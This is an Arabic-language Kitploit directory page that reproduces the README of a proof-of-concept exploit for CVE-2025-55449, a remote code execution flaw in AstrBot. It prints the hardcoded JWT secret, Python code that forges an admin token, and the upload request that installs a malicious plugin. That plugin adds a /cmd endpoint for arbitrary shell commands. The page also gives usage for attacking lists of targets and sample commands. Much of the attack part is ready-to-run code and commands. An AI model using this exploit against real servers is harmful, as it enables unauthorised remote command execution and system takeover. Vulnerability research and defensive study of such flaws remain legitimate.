Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55449 — CVE-2025-55449 EXP | Kitploit
أدوات/GitHubGitHub/xhh1h/cve-2025-55449
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالمصادقةتطوير الحمولات
GitHubxhh1h/cve-2025-55449

CVE-2025-55449

CVE-2025-55449 EXP

عرض المستودع
34منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55449 - ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في AstrBot

نظرة عامة

يحتوي هذا المستودع على استغلال لإثبات المفهوم لثغرة CVE-2025-55449، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في AstrBot. تسمح هذه الثغرة للمهاجم بتنفيذ تعليمات برمجية عشوائية على النظام المستهدف من خلال استغلال ضعف مصادقة JWT وآلية تثبيت الإضافات.

وصف الثغرة

توجد الثغرة بسبب:

  1. مفتاح JWT السري الثابت: يستخدم AstrBot مفتاح JWT سريًا ثابتًا (Advanced_System_for_Text_Response_and_Bot_Operations_Tool) للمصادقة، مما يسمح للمهاجمين بتزوير رموز مصادقة صالحة.

  2. تثبيت إضافات غير مقيد: تسمح نقطة النهاية /api/plugin/install-upload للمستخدمين المصادق عليهم برفع الإضافات وتثبيتها دون تحقق مناسب، مما يتيح تنفيذ كود Python عشوائي.

  3. تنفيذ التعليمات البرمجية عبر نظام الإضافات: يتيح نظام الإضافات للإضافات تعديل توجيه التطبيق وتنفيذ أوامر عشوائية عبر مثيل تطبيق Flask/Quart.

التفاصيل التقنية

ناقل الهجوم

  1. تزوير رمز JWT: يزوّر الاستغلال رمز JWT باستخدام المفتاح السري الثابت مع صلاحيات المسؤول.

  2. ثغرة تنفيذ التعليمات البرمجية: تستغل ثغرة تنفيذ التعليمات البرمجية عن بُعد في النهاية الخلفية ميزة تمديد الإضافات المدمجة في التطبيق، مما يسمح للمستخدمين برفع حزم إضافات مخصصة. يقوم البرنامج بفك ضغط الحزم، وقراءة معلومات الإضافة، واستيراد ملف Python الخاص بالكائن، وتنفيذ التعليمات البرمجية.

تدفق الاستغلال

root@kitploit:~
1. Forge JWT token with hardcoded secret
2. Create malicious plugin ZIP file
3. POST to /api/plugin/install-upload with forged token
4. Plugin installs and adds /cmd endpoint
5. Execute commands via /cmd?cmd=<command>

المتطلبات

  • Python 3.6+
  • حزم Python المطلوبة:
    • jwt (PyJWT)
    • requests
    • zipfile (مدمجة)
    • argparse (مدمجة)
    • datetime (مدمجة)
    • pathlib (مدمجة)

التثبيت

  1. استنسخ هذا المستودع:
root@kitploit:~
git clone <repository-url>
cd CVE-2025-55449
  1. ثبّت التبعيات المطلوبة:
root@kitploit:~
pip install PyJWT requests

الاستخدام

هدف واحد

نفّذ الاستغلال ضد عنوان URL لهدف واحد:

root@kitploit:~
python main.py http://target-ip:port

أهداف متعددة

أنشئ ملفًا (ip.txt) يحتوي على عنوان URL واحد في كل سطر:

root@kitploit:~
http://target1:6185
http://target2:6185
http://target3:6185

ثم شغّل:

root@kitploit:~
python main.py -r ip.txt

مثال على المخرجات

عند نجاح الاستغلال، سيخرج البرنامج النصي:

root@kitploit:~
http://target-ip:port/cmd?cmd=id

يمكنك بعد ذلك تنفيذ الأوامر عن طريق الوصول إلى:

root@kitploit:~
http://target-ip:port/cmd?cmd=<your-command>

على سبيل المثال:

root@kitploit:~
http://target-ip:port/cmd?cmd=whoami
http://target-ip:port/cmd?cmd=ls -la

هيكل المشروع

root@kitploit:~
CVE-2025-55449/
├── main.py                 # Main exploit script
├── ip.txt                  # Example target URLs file
├── README.md              # This file
└── helloworld/            # Malicious plugin directory
    ├── main.py            # Plugin code that adds /cmd endpoint
    ├── metadata.yaml      # Plugin metadata
    ├── LICENSE            # Plugin license
    └── README.md          # Plugin readme

كيف يعمل

تزوير رمز JWT

يستخدم الاستغلال مفتاح JWT السري الثابت لإنشاء رمز مصادقة صالح:

root@kitploit:~
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")

الإضافة الخبيثة

تستغل الإضافة (helloworld/main.py) نظام الاستيراد في Python ومثيل تطبيق Flask/Quart لحقن مسار جديد:

root@kitploit:~
# The plugin finds the Quart application instance and adds a /cmd route
# that executes arbitrary commands via os.popen()

رفع الإضافة

يقوم الاستغلال بتجميع الإضافة كملف ZIP ورفعها عبر نقطة النهاية المصادق عليها:

root@kitploit:~
requests.post(
    url + "/api/plugin/install-upload",
    headers={"Authorization": "Bearer " + forged},
    files={"file": (name + ".zip", zip_payload_bytes)}
)
تنزيل الأداة